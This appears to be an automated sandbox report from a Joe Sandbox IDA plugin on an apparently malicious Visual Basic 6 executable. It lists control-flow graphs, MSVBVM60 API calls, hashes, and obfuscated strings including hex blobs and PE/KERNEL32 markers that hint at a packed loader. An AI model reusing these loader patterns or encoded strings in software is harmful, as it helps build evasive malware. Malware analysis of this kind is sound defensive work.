                                                                                    control_flow_graph 0 41b886-41b939 __vbaChkstk __vbaAryConstruct2 __vbaStrCopy #644 __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock call 416d94 __vbaSetSystemError 3 41b940-41b9b1 #644 __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock call 416d94 __vbaSetSystemError 0->3 4 41b93b 0->4 9 41b9b3 3->9 10 41b9b8-41b9c1 3->10 5 41dc0e-41dcbf __vbaAryDestruct __vbaFreeStr * 3 __vbaRecDestruct __vbaAryDestruct 4->5 9->5 11 41b9c3 10->11 12 41b9c8-41bd40 call 41b7b8 __vbaAryMove __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim #644 __vbaDerefAry1 __vbaVarMove __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove #644 __vbaDerefAry1 __vbaVarMove #644 __vbaDerefAry1 __vbaVarMove #644 __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 10->12 11->5 21 41bd42 12->21 22 41bd47-41bedc __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero #644 __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 12->22 21->5 29 41bee2-41c04f __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 22->29 30 41c054-41c077 #644 22->30 29->5 31 41c082-41c087 __vbaGenerateBoundsError 30->31 32 41c079-41c080 30->32 34 41c08d-41c0cc #644 call 416d94 __vbaSetSystemError 31->34 32->34 41 41c0da-41c2f1 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 34->41 42 41c0ce-41c0d4 34->42 50 41c2f7-41c464 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 41->50 51 41c469-41c472 41->51 42->41 50->5 53 41c500-41c6e9 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 51->53 54 41c478-41c481 51->54 80 41c861-41c8be __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock call 416d94 __vbaSetSystemError 53->80 81 41c6ef-41c85c __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 53->81 56 41c487-41c48a 54->56 57 41dce6-41ddd9 __vbaErrorOverflow __vbaChkstk __vbaOnError call 41aafb __vbaStrMove * 2 __vbaStrCat #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVar 54->57 56->57 62 41c490-41c493 56->62 72 41de93-41df45 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41aafb __vbaStrMove call 41ae58 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 57->72 73 41dddf-41de8e __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41aafb __vbaStrMove call 41ae58 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 57->73 62->57 66 41c499-41c4fb __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock #644 call 416d94 __vbaSetSystemError 62->66 66->53 101 41df48-41df56 72->101 73->101 80->57 94 41c8c4-41c8fb 80->94 81->5 99 41c901-41c92f #644 __vbaAryLock 94->99 100 41ca2b-41ca34 94->100 99->57 103 41c935-41c93d 99->103 107 41ca3a-41ca4f 100->107 108 41cd2e-41cf52 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 100->108 105 41df73 101->105 106 41df58-41df71 __vbaNew2 101->106 103->57 109 41c943-41c948 103->109 110 41df7d-41dfa4 __vbaObjSet call 41e01c 105->110 106->110 112 41ca53-41ca59 107->112 132 41cf58-41d0c5 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 108->132 133 41d0ca-41d278 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 108->133 109->57 114 41c94e-41c9c4 __vbaDerefAry1 #644 __vbaAryUnlock call 416d94 __vbaSetSystemError call 41b664 __vbaStrMove 109->114 124 41dfa9-41dffd __vbaFreeObj 110->124 112->108 113 41ca5f-41ca6b 112->113 113->57 116 41ca71-41ca74 113->116 114->57 135 41c9ca-41ca21 __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock call 416d94 __vbaSetSystemError 114->135 116->57 122 41ca7a-41caad #644 call 416d94 __vbaSetSystemError 116->122 122->57 134 41cab3-41cabd 122->134 132->5 133->57 159 41d27e-41d4a6 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarZero #644 __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 133->159 137 41cac3-41caca 134->137 138 41cd29 134->138 135->100 137->138 142 41cad0-41cad9 137->142 138->112 142->57 146 41cadf-41cafe 142->146 149 41cb00-41cb06 146->149 150 41cb08-41cb14 _adj_fdiv_m64 146->150 153 41cb19-41cb1d 149->153 150->153 157 41dce1 153->157 158 41cb23-41cb3a __vbaFpI4 153->158 157->57 158->57 160 41cb40-41cb72 #644 call 416d94 __vbaSetSystemError 158->160 175 41d4ac-41d619 __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 159->175 176 41d61e-41d627 159->176 160->57 165 41cb78-41cbb4 __vbaI2I4 160->165 165->138 169 41cbba-41cbe4 165->169 171 41cbe6-41cbec 169->171 172 41cbee-41cbfa _adj_fdiv_m64 169->172 174 41cbff-41cc03 171->174 172->174 174->157 178 41cc09-41cc2e __vbaFpI4 __vbaI2I4 174->178 175->5 176->57 177 41d62d-41d7ca __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero #644 __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 176->177 202 41d7d0-41d93d __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 177->202 203 41d942-41da3b __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaStrMove call 41b018 177->203 181 41cc30 178->181 182 41cc35-41cc3f 178->182 181->138 185 41cc41-41cc47 182->185 186 41cc49-41cc4e 182->186 189 41cc56-41cc5f 185->189 186->189 190 41cc50 186->190 189->57 193 41cc65-41cc6b 189->193 190->189 193->57 196 41cc71-41cc7a 193->196 199 41ccf1-41ccf7 196->199 200 41cc7c-41ccb2 #644 call 416d94 __vbaSetSystemError 196->200 199->57 204 41ccfd-41cd1f #644 call 416d94 __vbaSetSystemError 199->204 200->57 210 41ccb8-41ccbb 200->210 202->5 222 41da40-41da9b __vbaErase __vbaFreeStrList 203->222 204->138 210->57 214 41ccc1-41ccec #644 call 416d94 __vbaSetSystemError 210->214 214->199 222->5 224 41daa1-41dc0b __vbaStrCopy call 41acf6 __vbaStrMove __vbaStrCopy __vbaStrMove call 41ae58 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaDerefAry1 __vbaVarMove __vbaStrMove call 41b018 __vbaErase __vbaFreeStrList 222->224 224->5
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041B8A4
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8C4
                                                                                    • __vbaStrCopy.MSVBVM60(?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8D1
                                                                                    • #644.MSVBVM60(?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8DD
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8F1
                                                                                    • __vbaDerefAry1.MSVBVM60(?,00000000,?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8FE
                                                                                    • #644.MSVBVM60(00000000,?,00000000,?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B904
                                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B916
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000,?,00000000,?,00000000,?,?,00418434,00000011), ref: 0041B92B
                                                                                    • #644.MSVBVM60(?), ref: 0041B947
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,?), ref: 0041B95E
                                                                                    • __vbaDerefAry1.MSVBVM60(?,?,?,00000000,?), ref: 0041B96F
                                                                                    • #644.MSVBVM60(00000000,?,?,?,00000000,?), ref: 0041B975
                                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,?,?,?,00000000,?), ref: 0041B987
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,000000F8,?,00000000,?,?,?,00000000,?), ref: 0041B9A2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC83
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC8B
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC93
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC9B
                                                                                    • __vbaRecDestruct.MSVBVM60(00417150,?,00000000,?,0041DCC0), ref: 0041DCAC
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00417150,?,00000000,?,0041DCC0), ref: 0041DCBA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$#644$DestructFree$Ary1DerefErrorLockSystemUnlock$ChkstkConstruct2Copy
                                                                                    • String ID: $$$$1F132D311D3A03250D35391E1D2D082C392A$21141925070F233900262436113D3F39$2227123C1B3D21250E320D1A05271E1C$250027321D0607282907091D16002B12$310B332A3309221F101360020D382A2C18361A353E0D2A010C275F7F5B4D4053457B6906291B04282F3B03253267241E34$323C1600153408171A0227140232$331D1B2C37363F0720173B11$34200607101100041D050933$39013B071F352D1E182F2A$3D391132302D1E1220353A1A300E$@$@$DohIsjTAXjJOpbNYELswLcxnilHMTWnTGvRnxdGgEXD$JbItseplEqifPrnxZrWWyrLteYMYDcjL$KERNEL32$MZ$NaxhYZSkoRrZuueHfvOCJjpJwNurLgLkabdqoBYPJl$NmFZIAfQpvgNLHlvjjWwPIbXjPQkQkcscvJPZhktdN$PE$PHaDExjqJnPJmPHeCKSUaUOVQibgCiPNd$\Microsoft.NET\Framework\v4.0.30319$ikPcFELrSLYUyuvnxqqIhY$lqNsaaQXeuaBgqspwIRQDEvkgcPUSISAaAKYQHUXxtU$sbeSfutbIMDf$tqBfhsODDjqb$yuqkHnaBMevVYrXLJibiuUu
                                                                                    • API String ID: 156183336-1715039212
                                                                                    • Opcode ID: 3f9243ccf007584edf98e65947650d2a1fe05f57fba7ea98ddab5f8e381595ca
                                                                                    • Instruction ID: 41fe362a22c8944d5e3f01c0ae7673ddc6b9ee917e3f6520ae82f7a8616e00d2
                                                                                    • Opcode Fuzzy Hash: 3f9243ccf007584edf98e65947650d2a1fe05f57fba7ea98ddab5f8e381595ca
                                                                                    • Instruction Fuzzy Hash: ED231A72D409289ADB21EB61CC51BDFB7B9AB0430AF1080EAE109B7191EB795FC5CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418C4B Relevance: 107.3, APIs: 60, Strings: 1, Instructions: 513COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 231 418c4b-418cba __vbaChkstk __vbaOnError 233 418cd5-418cd8 231->233 234 418cbc-418cd3 __vbaNew2 231->234 235 418cde-418d31 call 41aafb __vbaStrMove 233->235 234->235 239 418d53 235->239 240 418d33-418d51 __vbaHresultCheckObj 235->240 241 418d5a-418db2 __vbaCastObj __vbaObjSet __vbaFreeStr __vbaFreeObj 239->241 240->241 243 418dd1 241->243 244 418db4-418dcf __vbaHresultCheckObj 241->244 245 418dd8-418e13 __vbaObjSet __vbaForEachCollObj 243->245 244->245 246 41930d-419314 245->246 247 418e18-418e3d 246->247 248 41931a-41940c __vbaCastObj __vbaObjSet __vbaCastObj __vbaObjSet __vbaCastObj __vbaObjSet __vbaFreeObjList __vbaFreeObj __vbaAryDestruct __vbaFreeObj * 2 246->248 251 418e5c 247->251 252 418e3f-418e5a __vbaHresultCheckObj 247->252 253 418e63-418e81 251->253 252->253 255 418ea0 253->255 256 418e83-418e9e __vbaHresultCheckObj 253->256 257 418ea7-418ef7 __vbaInStr * 2 __vbaFreeStrList 255->257 256->257 258 419157-41917c 257->258 259 418efd-418f2c 257->259 262 41919b 258->262 263 41917e-419199 __vbaHresultCheckObj 258->263 264 418f4b 259->264 265 418f2e-418f49 __vbaHresultCheckObj 259->265 266 4191a2-4191e0 call 41aafb __vbaStrMove 262->266 263->266 267 418f52-418fc1 call 41aafb __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 41b3e6 __vbaStrMove 264->267 265->267 275 4191e2-4191fd __vbaHresultCheckObj 266->275 276 4191ff 266->276 279 418fe0 267->279 280 418fc3-418fde __vbaHresultCheckObj 267->280 278 419206-41929c __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove * 2 __vbaStrCopy 275->278 276->278 283 4192be 278->283 284 41929e-4192bc __vbaHresultCheckObj 278->284 282 418fe7-419025 call 41aafb __vbaStrMove 279->282 280->282 290 419044 282->290 291 419027-419042 __vbaHresultCheckObj 282->291 286 4192c5-4192e8 __vbaFreeStrList 283->286 284->286 288 4192eb-419307 __vbaNextEachCollObj 286->288 288->246 292 41904b-4190ef __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove * 3 290->292 291->292 294 419111 292->294 295 4190f1-41910f __vbaHresultCheckObj 292->295 296 419118-419152 __vbaFreeStrList 294->296 295->296 296->288
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00418C69
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 00418CAA
                                                                                    • __vbaNew2.MSVBVM60(004171B8,00000000), ref: 00418CC5
                                                                                    • __vbaStrMove.MSVBVM60(00000015,?), ref: 00418D0B
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171C8,00000054), ref: 00418D46
                                                                                    • __vbaCastObj.MSVBVM60(?,004171D8), ref: 00418D62
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,004171D8), ref: 00418D6C
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,?,004171D8), ref: 00418D74
                                                                                    • __vbaFreeObj.MSVBVM60(?,00000000,?,004171D8), ref: 00418D7C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171D8,00000068), ref: 00418DC4
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 00418DF2
                                                                                    • __vbaForEachCollObj.MSVBVM60(004171E8,?,?,00000000,?,?), ref: 00418E08
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418E4F
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418E93
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00418EB3
                                                                                    • __vbaInStr.MSVBVM60(00000000,.txt,?,00000001,00000000,00000000,?,00000001), ref: 00418EC6
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,.txt,?,00000001,00000000,00000000,?,00000001), ref: 00418EE6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418F3E
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 00418F63
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000,00000015), ref: 00418F6E
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000,00000015), ref: 00418F78
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170F4,00000000,00000015), ref: 00418F81
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000,00000015), ref: 00418F8B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,004170F4,00000000,00000015), ref: 00418F9E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418FD3
                                                                                      • Part of subcall function 0041AAFB: __vbaChkstk.MSVBVM60(00000015,004016A6,00000001,?,?,?,?,004016A6), ref: 0041AB17
                                                                                      • Part of subcall function 0041AAFB: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB47
                                                                                      • Part of subcall function 0041AAFB: __vbaStrCopy.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB5B
                                                                                      • Part of subcall function 0041AAFB: __vbaNew2.MSVBVM60(00416410,0041F010,000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB7A
                                                                                      • Part of subcall function 0041AAFB: __vbaHresultCheckObj.MSVBVM60(00000000,?,004168F4,00000058), ref: 0041ABBE
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(?,?,000000FF), ref: 0041ABE0
                                                                                      • Part of subcall function 0041AAFB: #525.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC07
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC11
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToAnsi.MSVBVM60(?,?,00000104,?,?,000000FF), ref: 0041AC24
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC35
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToUnicode.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC41
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC58
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 00419002
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00419037
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,004171E8,00000020), ref: 00419061
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000), ref: 0041906C
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000), ref: 00419076
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041907F
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 00419089
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 004190A4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 004190BF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 00419104
                                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041914A
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 0041918E
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 004191BD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 004191F2
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,004171E8,00000020), ref: 0041921C
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000), ref: 00419227
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000), ref: 00419231
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041923A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 00419244
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041925F
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041926C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 004192B1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,00000000), ref: 004192E3
                                                                                    • __vbaNextEachCollObj.MSVBVM60(004171E8,?,?), ref: 00419302
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171E8), ref: 00419328
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,004171E8), ref: 00419332
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171D8,?,00000000,00000000,004171E8), ref: 00419345
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 0041934F
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171A8,?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 00419362
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,004171A8,?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 0041936C
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?,0041940D,?,00000000,00000000,004171A8,?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 004193E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$CheckHresult$Free$CastErrorList$ChkstkCollCopyEachNew2System$#525AnsiNextUnicode
                                                                                    • String ID: .txt
                                                                                    • API String ID: 759863438-2195685702
                                                                                    • Opcode ID: 81c78085e799ba46981566278baa428245e80f1395d6c3fbb0afbb7567141371
                                                                                    • Instruction ID: e9426b278dfe8678ca5e3732bfefe0d2f455cb118c757abbc66000c08e162939
                                                                                    • Opcode Fuzzy Hash: 81c78085e799ba46981566278baa428245e80f1395d6c3fbb0afbb7567141371
                                                                                    • Instruction Fuzzy Hash: 3A22C772D40218EFDB11EBA1CC45FDDBBB9BF08304F1081AAE509B71A1DB785A859F64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419436 Relevance: 96.6, APIs: 45, Strings: 10, Instructions: 380COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 297 419436-4194ab __vbaChkstk __vbaOnError 299 4194ad-4194d1 __vbaStrCopy call 418c4b 297->299 300 41951f-419530 297->300 303 4194d7-4194de 299->303 301 419536 300->301 302 41997d-419a0b __vbaErrorOverflow __vbaChkstk __vbaOnError 300->302 304 41953c-41954b 301->304 305 4194e0-4194f8 __vbaHresultCheckObj 303->305 306 4194fa 303->306 308 41954d-419571 __vbaStrCopy call 418c4b 304->308 309 4195bf-4195d0 304->309 311 4194fe-41951d __vbaFreeStr __vbaFreeVar 305->311 306->311 314 419577-41957e 308->314 309->302 310 4195d6 309->310 312 4195dc-4195eb 310->312 311->304 315 4195ed-419611 __vbaStrCopy call 418c4b 312->315 316 41965f-419670 312->316 317 419580-419598 __vbaHresultCheckObj 314->317 318 41959a 314->318 321 419617-41961e 315->321 316->302 320 419676 316->320 319 41959e-4195bd __vbaFreeStr __vbaFreeVar 317->319 318->319 319->312 322 41967c-41968b 320->322 323 419620-419638 __vbaHresultCheckObj 321->323 324 41963a 321->324 325 41968d-4196b1 __vbaStrCopy call 418c4b 322->325 326 4196ff-419710 322->326 328 41963e-41965d __vbaFreeStr __vbaFreeVar 323->328 324->328 330 4196b7-4196be 325->330 326->302 327 419716 326->327 329 41971c-41972c 327->329 328->322 333 419930-41995d 329->333 334 419732-419795 __vbaStrCat #645 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 329->334 331 4196c0-4196d8 __vbaHresultCheckObj 330->331 332 4196da 330->332 335 4196de-4196fd __vbaFreeStr __vbaFreeVar 331->335 332->335 337 419831-419894 __vbaStrCat #645 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 334->337 338 41979b-4197fb __vbaStrCat __vbaStrMove __vbaStrCopy * 2 334->338 335->329 337->333 339 41989a-4198fa __vbaStrCat __vbaStrMove __vbaStrCopy * 2 337->339 342 419817 338->342 343 4197fd-419815 __vbaHresultCheckObj 338->343 344 419916 339->344 345 4198fc-419914 __vbaHresultCheckObj 339->345 346 41981b-41982e __vbaFreeStrList 342->346 343->346 347 41991a-41992d __vbaFreeStrList 344->347 345->347 346->337 347->333
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00419452
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 00419497
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 004194BC
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 004194F0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419501
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00419509
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041955C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 00419590
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004195A1
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004195A9
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 004195FC
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 00419630
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419641
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00419649
